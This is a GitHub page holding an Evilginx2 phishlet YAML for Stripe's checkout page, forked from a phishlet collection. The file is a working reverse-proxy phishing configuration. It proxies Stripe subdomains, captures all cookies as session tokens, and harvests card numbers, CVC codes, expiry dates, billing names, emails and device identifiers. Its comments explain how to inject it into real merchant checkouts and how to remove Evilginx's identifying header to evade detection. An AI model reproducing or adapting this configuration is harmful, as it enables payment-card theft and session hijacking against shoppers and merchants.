forked from An0nUD4Y/Evilginx2-Phishlets
-
Notifications
You must be signed in to change notification settings - Fork 0
/
stripe.yaml
113 lines (94 loc) · 4.34 KB
/
stripe.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# Checkout Docs for reference
# https://stripe.com/docs/connect/creating-a-payments-page?destination-or-on-behalf-of=destination
# Steps to follow to integrate evilginx checkout in original payment checkout page
#
# 1) Replace all occurences of stripe.com in html files or in js files with evilginx2 domain
# 2) Read docs for other possible issues (Mentioned Above)
# 3) Also look at domain name stripe.network and change it with evilginx domain in all js and html files in checkout page of website.
# 4) Handling lure is difficult and will require a heavy evilginx2 source code modification, Alternate solution is to inject js in the website index or any page which will trigger the evilginx2 lure and create a valid evilginx session for that user.
#
# Checkout Page -
#
# https://checkout.stripe.com/c/pay/cs_live_b1VLOZemyS8VFjpL7CKqeF83LqaFkITaQd2uWgK0fdZ4D2qF5PBtN9itwh#fidkdWxOYHwnPyd1blppbHNgWmM0dDRLQF9IYDxNQ2c2U3VsYUZVfDJDYycpJ2hsYXYnP34nYnBsYSc%2FJ0tEJyknaHBsYSc%2FJzw9ZDw8MWRkKGY8MGcoMTQyPChkMGNgKDcwPDQwNTA2MzVgN2M3YGdmNycpJ3ZsYSc%2FJzZjZ2NkZDA9KGQ8YWAoMTVjZihnNzA9KDwxYDAzNzAwNjQ8ZzAzN2YwMid4KSdnYHFkdic%2FXlgpJ2lkfGpwcVF8dWAnPydocGlxbFpscWBoJyknd2BjYHd3YHdKd2xibGsnPydtcXF1dj8qKnJycitof3ZubGsrZmpoJ3gl
## List of SubDomains ---
# https://m.stripe.com
# https://m.stripe.network/
# https://js.stripe.com
# https://q.stripe.com
# https://api.stripe.com/
# https://r.stripe.com/
# https://stripe-camo.global.ssl.fastly.net/
# https://checkout.stripe.com
# Note: Do not Forget to remove the easter egg codes from evilginx2 (http_proxy.go),
# Search for 'cantFindMe' and 'egg' in http_proxy.go and comment all relevent code to remove the evilginx header (X-Evilginx)
name: 'stripe'
author: '@an0nud4y'
min_ver: '2.4.0'
proxy_hosts:
- {phish_sub: 'checkout', orig_sub: 'checkout', domain: 'stripe.com', session: true, auto_filter: true, is_landing: true}
- {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.network', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'js', orig_sub: 'js', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'q', orig_sub: 'q', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'api', orig_sub: 'api', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'r', orig_sub: 'r', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'stripe-camo.global.ssl', orig_sub: 'stripe-camo.global.ssl', domain: 'fastly.net', session: false, auto_filter: true, is_landing:false}
sub_filters:
- {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
auth_tokens:
- domain: '.stripe.com'
keys: ['.*,regexp']
- domain: 'm.stripe.com'
keys: ['.*,regexp']
- domain: 'stripe.com'
keys: ['.*,regexp']
credentials:
username:
key: 'card[number]'
search: '(.*)'
type: 'post'
password:
key: 'card[cvc]'
search: '(.*)'
type: 'post'
custom:
- key: 'type'
search: '(.*)'
type: 'post'
- key: 'card[number]'
search: '(.*)'
type: 'post'
- key: 'card[cvc]'
search: '(.*)'
type: 'post'
- key: 'card[exp_month]'
search: '(.*)'
type: 'post'
- key: 'card[exp_year]'
search: '(.*)'
type: 'post'
- key: 'billing_details[name]'
search: '(.*)'
type: 'post'
- key: 'billing_details[email]'
search: '(.*)'
type: 'post'
- key: 'guid'
search: '(.*)'
type: 'post'
- key: 'muid'
search: '(.*)'
type: 'post'
- key: 'sid'
search: '(.*)'
type: 'post'
- key: 'payment_user_agent'
search: '(.*)'
type: 'post'
auth_urls:
- '/'
- '/c'
login:
domain: 'checkout.stripe.com'
path: '/'